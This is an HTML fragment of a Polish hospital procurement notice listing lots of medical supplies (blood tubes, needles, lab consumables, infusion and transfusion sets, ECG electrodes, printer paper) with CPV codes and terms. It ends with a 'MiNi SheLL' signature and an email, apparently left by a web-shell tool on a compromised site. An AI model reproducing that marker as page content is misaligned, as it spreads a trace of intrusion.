<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> materiału medyczne probówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Probówki na  2 ml. krwi ( 13x75 mm), z EDTA-K3, sterylne
Probówki na  1ml krwi (13x75 mm),  z EDTA-K3, sterylne
Probówki na 1,8 ml krwi  ( 13x75 mm), z 0,2 ml 3,2 % roztworu cytryniany Na, z nieprzepuszczalną ścianką o zwiększonej grubości,  sterylne
Probówki do pomiaru OB. metodą logarytmiczną na 1,6 ml krwi  (  9x120 mm), z 0,4 ml 3,8% roztworu cytrynianu Na, sterylne - do zastosowania ze statywem pomiarowym  34. OBLG. 3-P
Probówki na 4 ml krwi (  13x75 mm), z przyspieszaczem wykrzepiania, sterylne
Probówki na 2 ml krwi (  13x75 mm), z przyspieszaczem wykrzepiania, sterylne
Probówki na 2 ml krwi ( 13x75 mm), z heparyną  Li, sterylne
Igły VACUTEST o wym. : 0,9 mm (20g) x 38 mm (1,1/2) - żółte , sterylne
Igły VACUTEST o wym. : 0,8 mm (21g) x 38 mm (1,1/2) - zielone, sterylne
Uchwyty ESA 1 do igły VACUTEST , z PP, jednorazowe, autoklaw owalne
Adaptery do uchwytów ESA 1 umożliwiające przyłączenie igieł typu Luer, sterylne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> materiały medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemniki do posiewu moczu  poj.120 ml, sterylne, pakowane osobno.	 9 000 szt.
Pojemniki do kału z łopatką, sterylne op.  1 500 szt.
Szkiełka podstawowe szlifowane gładkie op. 50 szt	1 000 szt.
Końcówki typu GILSON - żółte op. 500 szt.	7 500 szt.
Końcówki typu GILSON - niebieskie op. 500 szt.	4 000 szt.
Końcówki typu GILSON - bezbarwne 5000 dżuli.  Op. 500 szt.	 1 000 szt.
Probówki wirówkowe, stożkowe PP  poj. 10 ml  op. 500 szt.	2 500 szt.
Szkiełka nakrywkowe  ( 20 x 20)   1000 szt. w op.	15 000 szt.
Pipety pasterowskie poj. 3 ml z podziałką 500 szt w op. 	2 500  szt.
Probówki eppendorf  poj. 1,5 ml z podziałką  500 szt. 	12 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparaty do pompy objętościowej MEDIMA  Lines S  dl. 270 cm.	300 szt.
Przedłużacz do pompy infuzyjnej KZ - 11 jałowy, niepiroge. nietoksycz.	300 szt.
Kranik trójdrożny	500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> przyrządy do infuzyjne do przetaczania krwi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyrząd do przetaczania
płynów infuzyjnych typ IS, z długą, elastyczną komorą kroplową, o długości min. 60 mm ( część przezroczysta), nie zawierający ftalanów, igła boczna ścięta dwupłaszczyznowo, wyposażona w szczelny, zamykany napowietrznik, filtr płynu o średnicy oczek 15 um, dren o długości 150 cm, posiada precyzyjny regulator przepływu z zaczepem do mocowania końcówki drenu na tylnej powierzchni podczas przepływu w infuzji oraz dodatkowym miejscem do umieszczania igły bocznej po użyciu, sterylizowany EO, opakowanie przyrządu blister - pack. Logo producenta trwale umieszczone na przyrządzie. Brak ftalanów potwierdzony informacją na opakowaniu jednostkowym oraz w dołączonej do oferty karcie charakterystyki produktu chemicznego, wystawionej przez producenta produktu chemicznego, z którego zostały wykonane przyrządy.
Przyrząd do przetaczania
krwi typ TS z duża komorą kroplową o długości 90 mm, 20 kropli = 1 ml +/- 0,1,ml, wykonany z tworzywa nie zawierającego ftalanów zaopatrzony w zamykany, antybakteryjny filtr powietrza, wtopiony w komorę kroplową filtr krwi o wielkości oczek 200um, dren długości 150 cm posiadający precyzyjny regulator przepływu z zaczepem do mocowania końcówki drenu na tylnej powierzchni oraz dodatkowym otworem do umieszczania kolca igły biorczej po użyciu, sterylizowany EO, opakowanie przyrządu blister - pack. Logo producenta trwale umieszczone na przyrządzie. Brak ftalanów potwierdzony informacją na opakowaniu jednostkowym oraz w dołączonej do oferty karcie charakterystyki produktu chemicznego, wystawionej przez producenta produktu chemicznego, z którego zostały wykonane przyrządy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Elektrody do EKG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektrody do EKG jednorazowe Sorimex	10 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.71.11.40-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Papier  EKG i USG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier do EKG składanka 210 mm  SP 2107	500 szt
Papier do EKG składanka do aparatu Eli 250 	500 szt.
Papier do USG błyszczący  SONY  UPP-110 HG	 50 rolek
Papier do USG Mitsubishi video copy procesor ( K 61B - Ce/KP61B-ce)	20 op.
Etykiety samoprzylepne do BR DOQ (3783)	100 rolek
..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.34-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com